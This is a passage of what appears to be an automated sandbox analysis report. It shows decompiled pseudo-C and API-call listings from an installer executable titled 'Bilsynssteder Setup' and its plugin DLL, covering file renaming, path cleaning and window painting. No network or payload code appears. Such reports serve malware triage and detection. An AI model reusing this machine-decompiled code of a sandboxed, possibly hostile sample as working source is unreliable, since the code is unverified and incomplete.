                                  					E00403ECA( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                  					_t99 = GetDlgItem(_a4, 0x3e8);
                                  					E00403EDD(_t99);
                                  					SendMessageA(_t99, 0x45b, 1, 0);
                                  					_t85 =  *0x42ebb0; // 0x5aa248
                                  					_t86 =  *(_t85 + 0x68);
                                  					if(_t86 < 0) {
                                  						_t86 = GetSysColor( ~_t86);
                                  					}
                                  					SendMessageA(_t99, 0x443, 0, _t86);
                                  					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                  					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                  					 *0x428fec = 0;
                                  					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                  					 *0x428fec = 0;
                                  					return 0;
                                  				}
                                  			}






















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                  • String ID: Call$N$open
                                  • API String ID: 3615053054-2563687911
                                  • Opcode ID: 51a361e6dc41c16568c55e04c1d01dbf2954b7e404280b64648fd5416c1df2c8
                                  • Instruction ID: cd5527be7b01cdd750bd7826aa0acaeb768eecc7c59dcf5154f0932c76b133a4
                                  • Opcode Fuzzy Hash: 51a361e6dc41c16568c55e04c1d01dbf2954b7e404280b64648fd5416c1df2c8
                                  • Instruction Fuzzy Hash: A961AFB1A40209BFEF109F61CC45F6A7B69FB84741F10417AFB05BA2D1C7B8A951CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004058BE() {
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t16;
                                  				intOrPtr _t18;
                                  				long _t29;
                                  				char* _t37;
                                  				int _t43;
                                  				void* _t44;
                                  				intOrPtr* _t45;
                                  				long _t48;
                                  				CHAR* _t50;
                                  				void* _t52;
                                  				void* _t54;
                                  				void* _t55;
                                  				void* _t58;
                                  				void* _t59;
                                  
                                  				lstrcpyA(0x42bdb0, "NUL");
                                  				_t50 =  *(_t58 + 0x1c);
                                  				if(_t50 == 0) {
                                  					L3:
                                  					_t16 = GetShortPathNameA( *(_t58 + 0x20), 0x42c1b0, 0x400);
                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                  						_t43 = wsprintfA(0x42b9b0, "%s=%s\r\n", 0x42bdb0, 0x42c1b0);
                                  						_t18 =  *0x42ebb0; // 0x5aa248
                                  						_t59 = _t58 + 0x10;
                                  						E00405BBA(_t43, 0x42bdb0, 0x42c1b0, 0x42c1b0,  *((intOrPtr*)(_t18 + 0x128)));
                                  						_t16 = E00405846(0x42c1b0, 0xc0000000, 4);
                                  						_t54 = _t16;
                                  						 *(_t59 + 0x1c) = _t54;
                                  						if(_t54 != 0xffffffff) {
                                  							_t48 = GetFileSize(_t54, 0);
                                  							_t6 = _t43 + 0xa; // 0xa
                                  							_t52 = GlobalAlloc(0x40, _t48 + _t6);
                                  							if(_t52 == 0 || ReadFile(_t54, _t52, _t48, _t59 + 0x10, 0) == 0 || _t48 !=  *(_t59 + 0x10)) {
                                  								L19:
                                  								return CloseHandle(_t54);
                                  							} else {
                                  								if(E004057AB(_t44, _t52, "[Rename]\r\n") != 0) {
                                  									_t55 = E004057AB(_t44, _t26 + 0xa, 0x40936c);
                                  									if(_t55 == 0) {
                                  										_t54 =  *(_t59 + 0x1c);
                                  										L17:
                                  										_t29 = _t48;
                                  										L18:
                                  										E00405801(_t52 + _t29, 0x42b9b0, _t43);
                                  										SetFilePointer(_t54, 0, 0, 0);
                                  										WriteFile(_t54, _t52, _t48 + _t43, _t59 + 0x10, 0);
                                  										GlobalFree(_t52);
                                  										goto L19;
                                  									}
                                  									_t45 = _t52 + _t48;
                                  									_t37 = _t45 + _t43;
                                  									while(_t45 > _t55) {
                                  										 *_t37 =  *_t45;
                                  										_t37 = _t37 - 1;
                                  										_t45 = _t45 - 1;
                                  									}
                                  									_t29 = _t55 - _t52 + 1;
                                  									_t54 =  *(_t59 + 0x1c);
                                  									goto L18;
                                  								}
                                  								lstrcpyA(_t52 + _t48, "[Rename]\r\n");
                                  								_t48 = _t48 + 0xa;
                                  								goto L17;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					CloseHandle(E00405846(_t50, 0, 1));
                                  					_t16 = GetShortPathNameA(_t50, 0x42bdb0, 0x400);
                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                  						goto L3;
                                  					}
                                  				}
                                  				return _t16;
                                  			}






















                                  APIs
                                  • lstrcpyA.KERNEL32(0042BDB0,NUL,?,00000000,?,00000000,?,00405A74,?,?,00000001,00405634,?,00000000,000000F1,?), ref: 004058CE
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A74,?,?,00000001,00405634,?,00000000,000000F1,?), ref: 004058F2
                                  • GetShortPathNameA.KERNEL32 ref: 004058FB
                                    • Part of subcall function 004057AB: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059BD,00000000,[Rename]), ref: 004057BB
                                    • Part of subcall function 004057AB: lstrlenA.KERNEL32(?,?,00000000,004059BD,00000000,[Rename]), ref: 004057ED
                                  • GetShortPathNameA.KERNEL32 ref: 00405918
                                  • wsprintfA.USER32 ref: 00405936
                                  • GetFileSize.KERNEL32(00000000,00000000,0042C1B0,C0000000,00000004,0042C1B0,?,?,?,?,?), ref: 00405971
                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405980
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040599A
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059CA
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0042B9B0,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 00405A20
                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A32
                                  • GlobalFree.KERNEL32 ref: 00405A39
                                  • CloseHandle.KERNEL32(00000000), ref: 00405A40
                                    • Part of subcall function 00405846: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
                                    • Part of subcall function 00405846: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                  • String ID: %s=%s$NUL$[Rename]
                                  • API String ID: 3756836283-4148678300
                                  • Opcode ID: 0e8e631bf26e18e4e01423c26e0453d2a1c56ec703afa11c132e8a2a2869d5ab
                                  • Instruction ID: 071f1bedc6bad253eda7905f96c0224db6c740fdd14e9da81140b4a3fca74d15
                                  • Opcode Fuzzy Hash: 0e8e631bf26e18e4e01423c26e0453d2a1c56ec703afa11c132e8a2a2869d5ab
                                  • Instruction Fuzzy Hash: 0841D471B04755AFD2206B619C89F6B7A5CEB85754F14053AFD01F72C2E678A8008EBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                  				struct tagLOGBRUSH _v16;
                                  				struct tagRECT _v32;
                                  				struct tagPAINTSTRUCT _v96;
                                  				struct HDC__* _t70;
                                  				struct HBRUSH__* _t87;
                                  				struct HFONT__* _t94;
                                  				long _t102;
                                  				intOrPtr _t115;
                                  				signed int _t126;
                                  				struct HDC__* _t128;
                                  				intOrPtr _t130;
                                  
                                  				if(_a8 == 0xf) {
                                  					_t130 =  *0x42ebb0; // 0x5aa248
                                  					_t70 = BeginPaint(_a4,  &_v96);
                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                  					_a8 = _t70;
                                  					GetClientRect(_a4,  &_v32);
                                  					_t126 = _v32.bottom;
                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                  					while(_v32.top < _t126) {
                                  						_a12 = _t126 - _v32.top;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						asm("cdq");
                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                  						_t87 = CreateBrushIndirect( &_v16);
                                  						_v32.bottom = _v32.bottom + 4;
                                  						_a16 = _t87;
                                  						FillRect(_a8,  &_v32, _t87);
                                  						DeleteObject(_a16);
                                  						_v32.top = _v32.top + 4;
                                  					}
                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                  						_a16 = _t94;
                                  						if(_t94 != 0) {
                                  							_t128 = _a8;
                                  							_v32.left = 0x10;
                                  							_v32.top = 8;
                                  							SetBkMode(_t128, 1);
                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                  							_a8 = SelectObject(_t128, _a16);
                                  							DrawTextA(_t128, "Bilsynssteder Setup", 0xffffffff,  &_v32, 0x820);
                                  							SelectObject(_t128, _a8);
                                  							DeleteObject(_a16);
                                  						}
                                  					}
                                  					EndPaint(_a4,  &_v96);
                                  					return 0;
                                  				}
                                  				_t102 = _a16;
                                  				if(_a8 == 0x46) {
                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                  					_t115 =  *0x42eba8; // 0x40218
                                  					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                  				}
                                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                  			}















                                  APIs
                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32 ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextA.USER32(00000000,Bilsynssteder Setup,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: Bilsynssteder Setup$F
                                  • API String ID: 941294808-2844915942
                                  • Opcode ID: ba4e0aeaea3a811c503903e6f7a1a9974574a5d0e3280e24df55959760edf428
                                  • Instruction ID: d739c411fb0a3510c8e8b782188d1d9e67e91bc4641c8cbf6c57472f1a226fbe
                                  • Opcode Fuzzy Hash: ba4e0aeaea3a811c503903e6f7a1a9974574a5d0e3280e24df55959760edf428
                                  • Instruction Fuzzy Hash: FA418A71804249AFCB05CF95DD459BFBFB9FF44310F00812AF962AA1A0C738AA51DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E1000236D(void* __edx) {
                                  				intOrPtr _t19;
                                  				intOrPtr _t22;
                                  				void* _t24;
                                  				short* _t25;
                                  				void* _t26;
                                  				void* _t31;
                                  				void* _t33;
                                  				void* _t35;
                                  				void* _t37;
                                  				void* _t41;
                                  				void* _t44;
                                  				int _t49;
                                  				void* _t50;
                                  				void* _t56;
                                  				intOrPtr _t57;
                                  				short** _t60;
                                  				short** _t61;
                                  				void* _t62;
                                  				void* _t63;
                                  
                                  				_t56 = __edx;
                                  				_t19 =  *((intOrPtr*)(_t63 + 8));
                                  				_t57 =  *((intOrPtr*)(_t19 + 0x814));
                                  				 *((intOrPtr*)(_t63 + 0x10)) = _t57;
                                  				_t60 = (_t57 + 0x41 << 5) + _t19;
                                  				do {
                                  					if( *((intOrPtr*)(_t60 - 4)) != 0xffffffff) {
                                  						_t61 = _t60;
                                  					} else {
                                  						_t61 =  *_t60;
                                  					}
                                  					_t62 = E10001215();
                                  					_t49 = 0;
                                  					_t22 =  *((intOrPtr*)(_t60 - 8));
                                  					if(_t22 == 0) {
                                  						lstrcpyA(_t62, 0x10004034);
                                  					} else {
                                  						_t31 = _t22 - 1;
                                  						if(_t31 == 0) {
                                  							_push( *_t61);
                                  							goto L12;
                                  						} else {
                                  							_t33 = _t31 - 1;
                                  							if(_t33 == 0) {
                                  								E10001446(_t56,  *_t61, _t61[1], _t62);
                                  								goto L13;
                                  							} else {
                                  								_t35 = _t33 - 1;
                                  								if(_t35 == 0) {
                                  									lstrcpynA(_t62,  *_t61,  *0x1000405c);
                                  								} else {
                                  									_t37 = _t35 - 1;
                                  									if(_t37 == 0) {
                                  										WideCharToMultiByte(0, 0,  *_t61,  *0x1000405c, _t62,  *0x1000405c - 1, 0, 0);
                                  										 *( *0x1000405c + _t62 - 1) =  *( *0x1000405c + _t62 - 1) & 0x00000000;
                                  									} else {
                                  										_t41 = _t37 - 1;
                                  										if(_t41 == 0) {
                                  											_t44 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
                                  											_push( *0x1000405c);
                                  											_t50 = _t44;
                                  											_push(_t50);
                                  											_push( *_t61);
                                  											" {xv@uxv"();
                                  											WideCharToMultiByte(0, 0, _t50,  *0x1000405c, _t62,  *0x1000405c, 0, 0);
                                  											GlobalFree(_t50);
                                  											_t49 = 0;
                                  										} else {
                                  											if(_t41 == 1) {
                                  												_push( *_t60);
                                  												L12:
                                  												wsprintfA(_t62, 0x10004000);
                                  												L13:
                                  												_t63 = _t63 + 0xc;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_t24 = _t60[5];
                                  					if(_t24 != _t49 && ( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x18)))) != 2 ||  *((intOrPtr*)(_t60 - 4)) > _t49)) {
                                  						GlobalFree(_t24);
                                  					}
                                  					_t25 = _t60[4];
                                  					if(_t25 != _t49) {
                                  						if(_t25 != 0xffffffff) {
                                  							if(_t25 > _t49) {
                                  								E100012E8(_t25 - 1, _t62);
                                  								goto L29;
                                  							}
                                  						} else {
                                  							E10001278(_t62);
                                  							L29:
                                  						}
                                  					}
                                  					_t26 = GlobalFree(_t62);
                                  					 *((intOrPtr*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + 0x10)) - 1;
                                  					_t60 = _t60 - 0x20;
                                  				} while ( *((intOrPtr*)(_t63 + 0x10)) >= _t49);
                                  				return _t26;
                                  			}























                                  APIs
                                  • wsprintfA.USER32 ref: 100023D2
                                  • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
                                  • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
                                  • GlobalFree.KERNEL32 ref: 10002417
                                    • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                  • GlobalFree.KERNEL32 ref: 1000248E
                                  • GlobalFree.KERNEL32 ref: 100024B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                  • String ID: {xv@uxv
                                  • API String ID: 2278267121-1953920604
                                  • Opcode ID: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                  • Instruction ID: 2b73d6ec50a8d2f500b210c633f34be0aa2160400c3477ecc395e3c682f4b703
                                  • Opcode Fuzzy Hash: 3ee0894ed4fe1b0af880131e50e06ec5e86c9efe6cc015858b811f9b411bf8ba
                                  • Instruction Fuzzy Hash: DE41ADB1109216EFF715DFA4CC88E2BBBECFB042D57124619FA51921A9DB35AC409B31
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E100021AF(void* __edx, intOrPtr _a4) {
                                  				signed int _v4;
                                  				CHAR* _t32;
                                  				intOrPtr _t33;
                                  				void* _t34;
                                  				void* _t36;
                                  				void* _t43;
                                  				void** _t49;
                                  				CHAR* _t58;
                                  				void* _t59;
                                  				signed int* _t60;
                                  				void* _t61;
                                  				intOrPtr* _t62;
                                  				CHAR* _t63;
                                  				void* _t73;
                                  
                                  				_t59 = __edx;
                                  				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                  				while(1) {
                                  					_t9 = _a4 + 0x818; // 0x818
                                  					_t62 = (_v4 << 5) + _t9;
                                  					_t32 =  *(_t62 + 0x14);
                                  					if(_t32 == 0) {
                                  						goto L9;
                                  					}
                                  					_t58 = 0x1a;
                                  					if(_t32 == _t58) {
                                  						goto L9;
                                  					}
                                  					if(_t32 != 0xffffffff) {
                                  						if(_t32 <= 0 || _t32 > 0x19) {
                                  							 *(_t62 + 0x14) = _t58;
                                  						} else {
                                  							_t32 = E100012BF(_t32 - 1);
                                  							L10:
                                  						}
                                  						goto L11;
                                  					} else {
                                  						_t32 = E1000123B();
                                  						L11:
                                  						_t63 = _t32;
                                  						_t13 = _t62 + 8; // 0x820
                                  						_t60 = _t13;
                                  						if( *((intOrPtr*)(_t62 + 4)) != 0xffffffff) {
                                  							_t49 = _t60;
                                  						} else {
                                  							_t49 =  *_t60;
                                  						}
                                  						_t33 =  *_t62;
                                  						 *(_t62 + 0x1c) =  *(_t62 + 0x1c) & 0x00000000;
                                  						if(_t33 == 0) {
                                  							 *_t60 =  *_t60 & 0x00000000;
                                  						} else {
                                  							if(_t33 == 1) {
                                  								_t36 = E1000131B(_t63);
                                  								L27:
                                  								 *_t49 = _t36;
                                  								L31:
                                  								_t34 = GlobalFree(_t63);
                                  								if(_v4 == 0) {
                                  									return _t34;
                                  								}
                                  								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                  									_v4 = _v4 + 1;
                                  								} else {
                                  									_v4 = _v4 & 0x00000000;
                                  								}
                                  								continue;
                                  							}
                                  							if(_t33 == 2) {
                                  								 *_t49 = E1000131B(_t63);
                                  								_t49[1] = _t59;
                                  								goto L31;
                                  							}
                                  							_t73 = _t33 - 3;
                                  							if(_t73 == 0) {
                                  								_t36 = E10001224(_t63);
                                  								 *(_t62 + 0x1c) = _t36;
                                  								goto L27;
                                  							}
                                  							if(_t73 > 0) {
                                  								if(_t33 <= 5) {
                                  									_t61 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
                                  									MultiByteToWideChar(0, 0, _t63,  *0x1000405c, _t61,  *0x1000405c);
                                  									if( *_t62 != 5) {
                                  										 *(_t62 + 0x1c) = _t61;
                                  										 *_t49 = _t61;
                                  									} else {
                                  										_t43 = GlobalAlloc(0x40, 0x10);
                                  										 *(_t62 + 0x1c) = _t43;
                                  										 *_t49 = _t43;
                                  										__imp__CLSIDFromString(_t61, _t43);
                                  										GlobalFree(_t61);
                                  									}
                                  								} else {
                                  									if(_t33 == 6 && lstrlenA(_t63) > 0) {
                                  										 *_t60 = E100024D4(E1000131B(_t63));
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L31;
                                  					}
                                  					L9:
                                  					_t32 = E10001224(0x10004034);
                                  					goto L10;
                                  				}
                                  			}


















                                  APIs
                                  • lstrlenA.KERNEL32(?), ref: 10002264
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000228E
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022B2
                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
                                  • GlobalFree.KERNEL32 ref: 100022C6
                                  • GlobalFree.KERNEL32 ref: 100022FD
                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                  • String ID: @uxv
                                  • API String ID: 3955009414-3068791405
                                  • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                  • Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
                                  • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                  • Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405E03(CHAR* _a4) {
                                  				char _t5;
                                  				char _t7;
                                  				char* _t15;
                                  				char* _t16;
                                  				CHAR* _t17;
                                  
                                  				_t17 = _a4;
                                  				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                  					_t17 =  &(_t17[4]);
                                  				}
                                  				if( *_t17 != 0 && E004056B2(_t17) != 0) {
                                  					_t17 =  &(_t17[2]);
                                  				}
                                  				_t5 =  *_t17;
                                  				_t15 = _t17;
                                  				_t16 = _t17;
                                  				if(_t5 != 0) {
                                  					do {
                                  						if(_t5 > 0x1f &&  *((char*)(E00405670("*?|<>/\":", _t5))) == 0) {
                                  							E00405801(_t16, _t17, CharNextA(_t17) - _t17);
                                  							_t16 = CharNextA(_t16);
                                  						}
                                  						_t17 = CharNextA(_t17);
                                  						_t5 =  *_t17;
                                  					} while (_t5 != 0);
                                  				}
                                  				 *_t16 =  *_t16 & 0x00000000;
                                  				while(1) {
                                  					_t16 = CharPrevA(_t15, _t16);
                                  					_t7 =  *_t16;
                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                  						break;
                                  					}
                                  					 *_t16 =  *_t16 & 0x00000000;
                                  					if(_t15 < _t16) {
                                  						continue;
                                  					}
                                  					break;
                                  				}
                                  				return _t7;
                                  			}









                                  APIs
                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E5B
                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E6D
                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E7D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-3761635984
                                  • Opcode ID: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                  • Instruction ID: fde9db7261816c846b9818803ccfda6df055d64d399c84b755319e1cb08c2998
                                  • Opcode Fuzzy Hash: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                  • Instruction Fuzzy Hash: 8911C871804B9529EB3217389C44B777FC8CB567A0F18007BE5D5723C2D67C5E428AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403F0F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                  				struct tagLOGBRUSH _v16;
                                  				long _t35;
                                  				long _t37;
                                  				void* _t40;
                                  				long* _t49;
                                  
                                  				if(_a4 + 0xfffffecd > 5) {
                                  					L15:
                                  					return 0;
                                  				}
                                  				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                  				if(_t49 == 0) {
                                  					goto L15;
                                  				}
                                  				_t35 =  *_t49;
                                  				if((_t49[5] & 0x00000002) != 0) {
                                  					_t35 = GetSysColor(_t35);
                                  				}
                                  				if((_t49[5] & 0x00000001) != 0) {
                                  					SetTextColor(_a8, _t35);
                                  				}
                                  				SetBkMode(_a8, _t49[4]);
                                  				_t37 = _t49[1];
                                  				_v16.lbColor = _t37;
                                  				if((_t49[5] & 0x00000008) != 0) {
                                  					_t37 = GetSysColor(_t37);
                                  					_v16.lbColor = _t37;
                                  				}
                                  				if((_t49[5] & 0x00000004) != 0) {
                                  					SetBkColor(_a8, _t37);
                                  				}
                                  				if((_t49[5] & 0x00000010) != 0) {
